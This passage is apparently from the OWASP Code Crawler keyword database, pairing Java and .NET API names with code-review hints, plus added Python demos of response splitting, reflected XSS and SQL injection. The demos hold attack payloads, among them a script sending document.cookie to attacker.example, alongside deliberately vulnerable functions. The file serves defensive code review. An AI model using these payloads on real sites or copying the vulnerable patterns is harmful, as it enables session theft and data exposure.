<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Hack</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest things in their source code. Look for keywords like this one in comments as pointers to possible software vulnerabilities or known shortcuts.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRequestedSessionId</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request. The requested session id is whatever the client sent (cookie or URL) and may not correspond to a valid session; check with isRequestedSessionIdValid() and use getSession() for the real session.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getValue</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getComment</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getDomain</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getPath</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getName</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; cookie tampering, HTTP response splitting and information leakage. It should be examined closely, as many such APIs obtain their values directly from the HTTP request.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>update</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code helps determine whether the application is vulnerable to SQL injection. One check is that the code uses SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient, System.Data.OleDb, System.Data.Odbc) in .NET, or PreparedStatement with bound parameters in Java. These are typed and treat the parameter as a literal value, not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>setHeader</k_name>
<k_level>2</k_level>
<k_description>This call writes a response header. If the value originates from the request (parameter, header, URL or cookie) and reaches the header without validation, it may allow HTTP response splitting, header injection and information leakage. Examine closely where the value comes from and that it cannot contain CR or LF characters.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>addHeader</k_name>
<k_level>2</k_level>
<k_description>This call writes a response header. If the value originates from the request (parameter, header, URL or cookie) and reaches the header without validation, it may allow HTTP response splitting, header injection and information leakage. Examine closely where the value comes from and that it cannot contain CR or LF characters.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
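<!--
Added example for the getHeader / getQueryString / getCookies and setHeader / addHeader entries above. It is not part of the OWASP Code Crawler database: the database targets Java servlet and .NET APIs, while this self-contained Python block reproduces the pattern those entries describe, request data copied into a response header (the Location header of a redirect) so that a CRLF in the input starts a new header. The function names and the attacker payload are constructed for the example; there is no network traffic.

```python
"""HTTP response splitting: request value copied into a response header.

Added example, not part of the OWASP Code Crawler database.  The helper
names below are constructed for illustration; build_redirect_vulnerable()
stands in for servlet code doing response.setHeader("Location", param).
"""

import re
from urllib.parse import urlsplit

# CR, LF and NUL must never reach a response header: a CRLF pair ends the
# current header, so attacker text after it becomes a new header or the body.
_FORBIDDEN = re.compile(r"[\r\n\x00]")


class HeaderInjection(ValueError):
    """Raised when a value would be unsafe inside a response header."""


def has_header_injection(value: str) -> bool:
    """True if the value contains characters that would split the header."""
    return _FORBIDDEN.search(value) is not None


def is_safe_redirect(target: str, allowed_hosts: frozenset) -> bool:
    """Header-safe and either a relative path or an allow-listed http(s) host.

    A protocol-relative target such as //evil.example/x has an empty scheme
    but a netloc, so it is treated as absolute and must pass the host check."""
    if has_header_injection(target):
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts
    return True


def build_redirect_vulnerable(target: str) -> bytes:
    """The pattern a reviewer flags: request data goes straight into the header."""
    return ("HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n").encode("latin-1")


def build_redirect_hardened(target: str, allowed_hosts: frozenset) -> bytes:
    """Validate first; rejecting is preferable to silently stripping CR/LF."""
    if not is_safe_redirect(target, allowed_hosts):
        raise HeaderInjection("unsafe redirect target: %r" % target)
    return ("HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n").encode("latin-1")


def count_headers(raw: bytes) -> int:
    """Number of header lines a proxy or browser would parse from the head."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return len(head.split(b"\r\n")) - 1   # minus the status line


# Constructed attacker input: a URL-decoded 'next' parameter carrying CRLF.
PAYLOAD = "/home\r\nSet-Cookie: session=attacker\r\n\r\n<html>injected</html>"


def demo():
    """Returns (headers seen in the vulnerable response, whether the hardened
    version rejected the payload).  Expected: (2, True)."""
    injected = count_headers(build_redirect_vulnerable(PAYLOAD))
    blocked = not is_safe_redirect(PAYLOAD, frozenset({"example.com"}))
    return injected, blocked


if __name__ == "__main__":
    print(demo())
```

In the vulnerable build the injected Set-Cookie line is parsed as a second header and everything after the second blank line becomes the response body. The hardened build also closes the open-redirect hole that usually accompanies this sink, since a Location value that passes the CRLF check can still point off-site.
-->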
<KeyPointer>
<k_name>getWriter</k_name>
<k_level>2</k_level>
<k_description>This call obtains the writer for the response body. Data echoed from the request (parameter, header, URL or cookie) without validation or output encoding is a cross-site scripting and information leakage sink. Examine closely where everything written through it comes from.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getOutputStream</k_name>
<k_level>2</k_level>
<k_description>This call obtains the raw output stream for the response body. Data echoed from the request (parameter, header, URL or cookie) without validation or output encoding is a cross-site scripting and information leakage sink. Examine closely where everything written through it comes from.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>executequery</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code helps determine whether the application is vulnerable to SQL injection. One check is that the code uses SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient, System.Data.OleDb, System.Data.Odbc) in .NET, or PreparedStatement with bound parameters in Java. These are typed and treat the parameter as a literal value, not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ExecuteReader</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code helps determine whether the application is vulnerable to SQL injection. One check is that the code uses SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient, System.Data.OleDb, System.Data.Odbc). These are typed and treat the parameter as a literal value, not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.PrintWriter.print</k_name>
<k_level>2</k_level>
<k_description>This call writes data to an output stream, typically the HTTP response. Output that echoes external input without validation or encoding is a potential cross-site scripting sink, and writing error details or internal state leaks information; investigate where the written data comes from.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>jdbc</k_name>
<k_level>2</k_level>
<k_description>Check how the JDBC connection is authenticated. It is usually not an integrated (trusted) database connection, so verify that the user name and password are not stored in clear text in the code, the JDBC URL or a configuration file.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>select</k_name>
<k_level>2</k_level>
<k_description>Using SELECT * makes the code fragile against changes in the underlying table(s) and can return more columns, and therefore more data, than the caller needs; it should be avoided. Also check how the WHERE clause is built, since SELECT statements are a common SQL injection point.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>insert</k_name>
<k_level>2</k_level>
<k_description>When exploiting INSERT statements an attacker usually gets no feedback over HTTP, whereas a SELECT may return database errors to the page. Injection into an INSERT is therefore likely to be blind SQL injection; review these statements with the same care as SELECTs.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>execute</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code helps determine whether the application is vulnerable to SQL injection. One check is that the code uses SqlParameter, OleDbParameter or OdbcParameter (System.Data.SqlClient, System.Data.OleDb, System.Data.Odbc) in .NET, or PreparedStatement with bound parameters in Java. These are typed and treat the parameter as a literal value, not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.ResultSet.getString</k_name>
<k_level>2</k_level>
<k_description>java.sql.ResultSet.getString() returns a column value as a string; in JDBC 1.0 the ResultSet interface offers only limited functionality. Data read back from the database is still external data and should be validated before it is written to a response or used in another query.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.ResultSet.getObject</k_name>
<k_level>2</k_level>
<k_description>java.sql.ResultSet.getObject() returns a column value as a Java object; in JDBC 1.0 the ResultSet interface offers only limited functionality. Data read back from the database is still external data and should be validated before it is written to a response or used in another query.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>innerHtml</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses that go unvalidated, or that echo external input without validation and output encoding, are key areas to examine. Many client-side attacks result from poor response validation; cross-site scripting (XSS) relies on it. Assigning untrusted data to innerHTML has the browser parse it as markup.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>innertext</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses that go unvalidated, or that echo external input without validation and output encoding, are key areas to examine. Many client-side attacks result from poor response validation; cross-site scripting (XSS) relies on it. innerText assignments are treated as text rather than markup, so check that the same value is not also written with innerHTML elsewhere.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
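<!--
Added example for the innerHtml / innertext entries above and for the getWriter / getOutputStream response sinks. It is not part of the OWASP Code Crawler database; it is a self-contained Python block showing the difference the descriptions talk about, reflecting external input into markup with and without output encoding, and it uses the standard-library HTML parser to count which tags a browser would actually see. The payload and function names are constructed for the example.

```python
"""Reflected input with and without HTML output encoding.

Added example, not part of the OWASP Code Crawler database.  The render
functions are constructed stand-ins for server code writing a response
body (or client code assigning to innerHTML) from a request parameter.
"""

import html
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Records the start tags a browser would see in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def render_vulnerable(name: str) -> str:
    """Input concatenated straight into markup: it is parsed as HTML."""
    return "<p>Hello, " + name + "</p>"


def render_hardened(name: str) -> str:
    """Encode for the HTML text context.  quote=True also escapes the two
    quote characters, so the same helper is safe inside attribute values."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def tags_from_input(fragment: str) -> list:
    """Start tags in the fragment other than the template's own <p>."""
    collector = TagCollector()
    collector.feed(fragment)
    return [t for t in collector.tags if t != "p"]


# Constructed attacker input: a cookie-stealing script in a 'name' parameter.
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def demo():
    """Returns (tags injected by the payload in the vulnerable render,
    tags injected in the hardened render).  Expected: (['script'], [])."""
    return (tags_from_input(render_vulnerable(PAYLOAD)),
            tags_from_input(render_hardened(PAYLOAD)))


if __name__ == "__main__":
    print(demo())
```

Encoding is context-specific: html.escape() is correct for element text and quoted attribute values, but data placed inside a script block, a URL or a CSS property needs the encoding for that context instead.
-->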
<KeyPointer>
<k_name>java.sql.Statement.execute</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code helps determine whether the application is vulnerable to SQL injection. One check is that the code uses PreparedStatement with bound parameters rather than java.sql.Statement with concatenated SQL text (SqlParameter, OleDbParameter or OdbcParameter are the .NET equivalents). These are typed and treat the parameter as a literal value, not as executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Statement.addBatch</k_name>
<k_level>2</k_level>
<k_description>It is recommended not to use this method carelessly: a database access error fails the whole batch, and the driver may not support batch updates at all (check DatabaseMetaData.supportsBatchUpdates()). Each SQL string added to the batch must be reviewed for injection like any other statement.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Connection.prepareStatement</k_name>
<k_level>2</k_level>
<k_description>Although prepared statements help defend against SQL injection, they can still be misused. For example, when input variables are concatenated into the SQL text before it is passed to prepareStatement(), instead of being bound to ? placeholders with the setXxx() methods, the statement is as injectable as a plain Statement.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Availability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
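<!--
Added example for the database entries above (update, executequery, ExecuteReader, execute, select, insert, java.sql.Statement.execute and java.sql.Connection.prepareStatement). It is not part of the OWASP Code Crawler database: the entries target JDBC and ADO.NET, while this block uses Python's sqlite3 module so that it runs stand-alone with no database server. sqlite3's ? placeholders play the role of PreparedStatement.setString() or SqlParameter, and the table, rows and payload are constructed for the example. The third lookup shows the prepareStatement misuse the last entry describes, where the text is built by concatenation and only then prepared.

```python
"""SQL injection: concatenated SQL text versus bound parameters.

Added example, not part of the OWASP Code Crawler database.  sqlite3 is
used in place of JDBC/ADO.NET so the block runs offline; the schema and
data are constructed for the example.
"""

import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret-a"), ("bob", "s3cret-b")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """The pattern the 'execute' entries flag: the variable is spliced into
    the SQL text, so a quote in it changes the statement."""
    sql = "SELECT name FROM users WHERE name = '" + name + "' ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def lookup_prepared_wrongly(conn: sqlite3.Connection, name: str) -> list:
    """prepareStatement misuse: the text is concatenated first and only then
    'prepared' (here: executed with an empty parameter tuple).  No better
    than lookup_vulnerable(), which is what the reviewer must spot."""
    sql = "SELECT name FROM users WHERE name = '" + name + "' ORDER BY name"
    return [row[0] for row in conn.execute(sql, ())]


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    """The value travels separately from the SQL text and can only be data."""
    rows = conn.execute(
        "SELECT name FROM users WHERE name = ? ORDER BY name", (name,))
    return [row[0] for row in rows]


# Classic tautology payload; no SQL comment sequence is needed for it to work.
PAYLOAD = "x' OR '1'='1"


def demo():
    """Returns the rows each variant yields for the payload, plus a normal
    lookup through the parameterized version.
    Expected: (['alice', 'bob'], ['alice', 'bob'], [], ['alice'])."""
    conn = make_db()
    return (lookup_vulnerable(conn, PAYLOAD),
            lookup_prepared_wrongly(conn, PAYLOAD),
            lookup_parameterized(conn, PAYLOAD),
            lookup_parameterized(conn, "alice"))


if __name__ == "__main__":
    print(demo())
```

The parameterized lookup returns nothing for the payload because the database compares the literal string x' OR '1'='1 with the name column; the same query text with the value concatenated in returns every row. The reviewer's test is therefore not "does the code call prepareStatement" but "is every variable bound through a placeholder".
-->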
<KeyPointer>
<k_name>java.io.FileReader</k_name>
<k_level>2</k_level>
<k_description>These calls read data into, or write data out of, the application and are potential entry points. The data may come from an external source and must be investigated. A file name taken from input can be used in path traversal attacks, and an unbounded read in DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.FileWriter</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one's application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.RandomAccessFile</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one's application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.File</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one's application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.FileOutputStream</k_name>
<k_level>2</k_level>
<k_description>These commands are generally used to read data into one's application. They may be potential entry points into the application. The entry points may be from an external source and must be investigated. They can also be used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameterNames</k_name>
<k_level>2</k_level>
<k_description>This API call may be an avenue for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. It should be examined closely as many such APIs obtain their parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>invalidate</k_name>
<k_level>2</k_level>
<k_description>Always be wary of session management. Look at each session object within the application and ensure its level of security meets the requirements.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getId</k_name>
<k_level>2</k_level>
<k_description>Always be wary of session management. Look at each session object within the application and ensure its level of security meets the requirements.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.lang.Runtime.exec</k_name>
<k_level>2</k_level>
<k_description>This method may be vulnerable to command injection attacks or OS command injection attacks. Java linking to the native OS can cause serious issues and potentially give rise to total server compromise.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.PrintStream.write</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>log4j</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>jLo</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Lumberjack</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>MonoLog</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>qflog</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>just4log</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>log4Ant</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>JDLabAgent</k_name>
<k_level>2</k_level>
<k_description>We may come across information leakage by examining the code below, contained in one's application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Ajax</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narrow our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
